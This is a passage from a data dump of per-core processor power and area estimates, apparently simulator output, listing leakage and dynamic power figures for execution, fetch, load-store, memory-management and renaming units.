'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.300959,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.601918,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.106811,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.10759,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.358754,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0359537,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.701909,
'Memory Management Unit/Runtime Dynamic': 0.143544,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.3689,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.280776,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.021376,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.178902,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.481054,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.22116,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0713146,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.258703,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.386822,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.474201,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.31606,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.547302,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.361286,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.22465,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.253108,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.355881,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.06018,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.073079,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0114574,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.109482,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0847348,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.182561,
'Execution Unit/Register Files/Runtime Dynamic': 0.0961922,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.28409,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.715316,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.12494,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00166271,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00166271,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00145611,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000567998,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00121722,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00599874,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0156599,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0814577,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.18141,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.199935,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.276667,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.65524,
'Instruction Fetch Unit/Runtime Dynamic': 0.579718,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0308971,
'L2/Runtime Dynamic': 0.00658136,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.62948,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.63018,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.109751,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.109751,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.14986,
'Load Store Unit/Runtime Dynamic': 2.28119,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.270627,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.541254,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0960464,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0965097,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.322161,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0327651,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.646705,
'Memory Management Unit/Runtime Dynamic': 0.129275,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.1046,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.254955,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0192295,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.160512,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.434697,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.5564,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0762837,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.262605,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.412148,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.485343,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.339814,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.588435,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.388001,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.31625,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.272705,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.375345,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.14672,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0778636,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0123185,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.11763,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0911031,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.195494,
'Execution Unit/Register Files/Runtime Dynamic': 0.103422,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.305142,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.768031,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.311,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00177035,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00177035,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00154852,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000603035,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0013087,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00639793,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0167402,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0875797,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.57082,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.212439,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.29746,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.06384,
'Instruction Fetch Unit/Runtime Dynamic': 0.620617,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0441599,
'L2/Runtime Dynamic': 0.00944066,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.88003,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.75061,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.117857,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.117857,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.43884,
'Load Store Unit/Runtime Dynamic': 2.44969,
